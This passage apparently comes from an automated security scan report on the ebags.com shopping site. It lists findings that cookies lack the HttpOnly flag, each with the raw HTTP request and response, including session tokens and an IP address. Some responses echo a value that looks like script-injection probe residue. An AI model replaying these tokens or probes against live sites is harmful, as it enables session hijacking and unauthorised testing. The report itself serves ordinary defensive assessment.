Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:07 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:07 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 117488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.29. http://www.ebags.com/category/handbags/10014/h/sale  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/handbags/10014/h/sale

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/handbags/10014/h/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 118388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.30. http://www.ebags.com/category/hobos/20036674  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/hobos/20036674

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/hobos/20036674 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:01 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:01 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 113957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...

3.31. http://www.ebags.com/category/hobos/20048614  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/hobos/20048614

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/hobos/20048614 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:06 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:06 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.32. http://www.ebags.com/category/travel-accessories/20014443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/travel-accessories/20014443

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/travel-accessories/20014443?ne=100 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373821|PC#1293371743230-938821.20#1294581561|check#true#1293372021; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1239; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371960055}; s_sq=ebagsprod%3D%2526pid%253DShopping%252520Cart%252520%25253A%252520View%252520Cart%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fsale%25252Ftravel_accessories%25252Fcategory_search%25252Findex.cfm%25253FNe%25253D100%252526N%25253D4001%25252B20014443%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:53 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 117508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...

3.33. http://www.ebags.com/department/backpacks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/backpacks

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/backpacks HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.34. http://www.ebags.com/department/bags-by-ebags  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/bags-by-ebags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/bags-by-ebags HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_cc=true; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbDomTm=0; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; __cmbTpvTm=1807; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":1,"to":3,"c":"http://www.ebags.com/product/case-logic/sony-psp-game-case/120830","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; s_sq=ebagsprod%3D%2526pid%253DProduct%252520Details%252520%25253A%252520120830%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fdepartment%25252Fbags-by-ebags%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:58:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:58:53 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 59606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.35. http://www.ebags.com/department/business-and-laptop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/business-and-laptop

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/business-and-laptop HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:04 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.36. http://www.ebags.com/department/designer-handbags  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/designer-handbags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/designer-handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:04:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 58408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.37. http://www.ebags.com/department/handbags  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/handbags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:04:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 71524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.38. http://www.ebags.com/department/kids-and-baby  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/kids-and-baby

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/kids-and-baby HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:39 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:39 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 65068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.39. http://www.ebags.com/department/luggage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/luggage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/luggage HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:01 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:01 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 73000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.40. http://www.ebags.com/department/messenger-bags  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/messenger-bags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/messenger-bags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
